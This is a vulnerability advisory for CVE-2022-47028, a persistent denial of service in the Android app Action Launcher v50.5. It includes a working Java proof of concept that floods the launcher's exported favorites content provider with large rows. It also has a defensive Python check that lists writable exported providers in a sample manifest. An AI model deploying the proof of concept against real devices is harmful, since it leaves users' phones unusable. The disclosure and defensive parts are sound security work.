CVE-2022-47028: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs
An issue discovered in Action Launcher for Android v50.5 allows an attacker to cause a denial of service via arbitrary data injection into the insert function.
Denial of Service exists in Action Launcher (CVE-2022-47028)
Vendor: Action Launcher (https://actionlauncher.com/)
Affected product: Action Launcher (com.actionlauncher.playstore)
Version: 50.5
Download link: https://play.google.com/store/apps/details?id=com.actionlauncher.playstore&hl=en
Description of the vulnerability for use in the CVE: Action Launcher v50.5 allows unauthorized apps to inject a large amount of data into its database, which is loaded into memory when the app is opened. The launcher app then fails to display the home screens and cannot respond to any user actions, resulting in a permanent Denial of Service (DoS).
Additional information: The app is a launcher app, which users can set as the phone's default launcher. When the launcher app is opened, it sets up the home screens by loading saved data from the database into memory. If a malicious app injects a large amount of data into the database, the launcher app gets stuck in the initialization phase because it loads that data on the UI thread. Worse still, users cannot fix the issue by rebooting the victim device, since the injected data persists in the database. In practice, the launcher app fails to display the home screens and cannot respond to any user actions.
PoC:

```java
public void attack_lancher() {
    ContentResolver contentResolver = getApplicationContext().getContentResolver();
    Uri uri = Uri.parse("content://com.actionlauncher.playstore.settings/favorites");
    for (int i = 0; i < Long.MAX_VALUE; i++) {
        ContentValues contentValues = new ContentValues();
        contentValues.put("screen", i);
        contentValues.put("title", getRandomString(102400));
        contentResolver.insert(uri, contentValues);
    }
}
```
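A check an app owner can run over their own decoded AndroidManifest.xml to list content providers that any installed app could insert into, which is the precondition this report relies on. This is an added example, not code from the report or from Action Launcher; the manifest, package and permission names are constructed, and it assumes targetSdk 17 or later, where a missing `android:exported` attribute means the provider is not exported.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"

# Constructed sample manifest (hypothetical app, not taken from any real APK).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.launcher">
  <permission android:name="com.example.launcher.WRITE_SIG"
      android:protectionLevel="signature"/>
  <permission android:name="com.example.launcher.WRITE_NORMAL"
      android:protectionLevel="normal"/>
  <application>
    <provider android:authorities="com.example.launcher.settings"
        android:exported="true"/>
    <provider android:authorities="com.example.launcher.widgets"
        android:exported="true"
        android:writePermission="com.example.launcher.WRITE_NORMAL"/>
    <provider android:authorities="com.example.launcher.guarded"
        android:exported="true"
        android:writePermission="com.example.launcher.WRITE_SIG"/>
    <provider android:authorities="com.example.launcher.private"
        android:exported="false"/>
  </application>
</manifest>"""


def writable_by_other_apps(manifest_xml):
    """Return {authority: reason} for providers that other apps can insert into."""
    root = ET.fromstring(manifest_xml)
    # Protection level of every permission this manifest declares itself.
    levels = {p.get(ANDROID + "name"): p.get(ANDROID + "protectionLevel", "normal")
              for p in root.iter("permission")}
    findings = {}
    for prov in root.iter("provider"):
        if prov.get(ANDROID + "exported") != "true":
            continue  # assumption: targetSdk >= 17, so unset means not exported
        authority = prov.get(ANDROID + "authorities")
        # writePermission takes precedence over the provider-wide permission.
        perm = prov.get(ANDROID + "writePermission") or prov.get(ANDROID + "permission")
        if perm is None:
            findings[authority] = "exported with no write permission"
            continue
        level = levels.get(perm, "unknown")  # permission declared elsewhere
        if "signature" not in level:
            findings[authority] = "write permission %s is %s level" % (perm, level)
    return findings
```

Restricting who can write is only half of the fix for the behaviour described here: the provider should also bound the size and number of rows it accepts, and the launcher should load them off the UI thread.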